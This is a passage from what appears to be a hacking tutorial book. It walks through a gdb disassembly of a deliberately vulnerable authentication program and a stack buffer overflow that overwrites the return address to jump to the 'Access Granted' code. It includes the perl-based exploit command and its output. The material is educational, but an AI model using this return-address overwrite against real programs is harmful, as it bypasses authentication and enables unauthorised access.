Graphics Programs Reference
In-Depth Information
0x0804848d <main+25>: mov eax,DWORD PTR [eax]
0x0804848f <main+27>: mov DWORD PTR [esp+4],eax
0x08048493 <main+31>: mov DWORD PTR [esp],0x80485e5
0x0804849a <main+38>: call 0x804831c <printf@plt>
0x0804849f <main+43>: mov DWORD PTR [esp],0x0
0x080484a6 <main+50>: call 0x804833c <exit@plt>
0x080484ab <main+55>: mov eax,DWORD PTR [ebp+12]
0x080484ae <main+58>: add eax,0x4
0x080484b1 <main+61>: mov eax,DWORD PTR [eax]
0x080484b3 <main+63>: mov DWORD PTR [esp],eax
0x080484b6 <main+66>: call 0x8048414 <check_authentication>
0x080484bb <main+71>: test eax,eax
0x080484bd <main+73>: je 0x80484e5 <main+113>
0x080484bf <main+75>: mov DWORD PTR [esp],0x80485fb
0x080484c6 <main+82>: call 0x804831c <printf@plt>
0x080484cb <main+87>: mov DWORD PTR [esp],0x8048619
0x080484d2 <main+94>: call 0x804831c <printf@plt>
0x080484d7 <main+99>: mov DWORD PTR [esp],0x8048630
0x080484de <main+106>: call 0x804831c <printf@plt>
0x080484e3 <main+111>: jmp 0x80484f1 <main+125>
0x080484e5 <main+113>: mov DWORD PTR [esp],0x804864d
0x080484ec <main+120>: call 0x804831c <printf@plt>
0x080484f1 <main+125>: leave
0x080484f2 <main+126>: ret
End of assembler dump.
(gdb)
This section of code shown in bold contains the instructions that display
the
Access Granted
message. The beginning of this section is at
0x080484bf
,
so if the return address is overwritten with this value, this block of instruc-
tions will be executed. The exact distance between the return address and
the start of the
password_buffer
can change due to different compiler versions
and different optimization flags. As long as the start of the buffer is aligned
with DWORDs on the stack, this mutability can be accounted for by simply
repeating the return address many times. This way, at least one of the instances
will overwrite the return address, even if it has shifted around due to compiler
optimizations.
reader@hacking:~/booksrc $ ./auth_overflow2 $(perl -e 'print "\xbf\x84\x04\x08"x10')
-=-=-=-=-=-=-=-=-=-=-=-=-=-
Access Granted.
-=-=-=-=-=-=-=-=-=-=-=-=-=-
Segmentation fault (core dumped)
r
eader@hacking:~/booksrc $
In the example above, the target address of
0x080484bf
is repeated 10 times
to ensure the return address is overwritten with the new target address. When
the
check_authentication()
function returns, execution jumps directly to the
new target address instead of returning to the next instruction after the call.
This gives us more control; however, we are still limited to using instructions
that exist in the original programming.
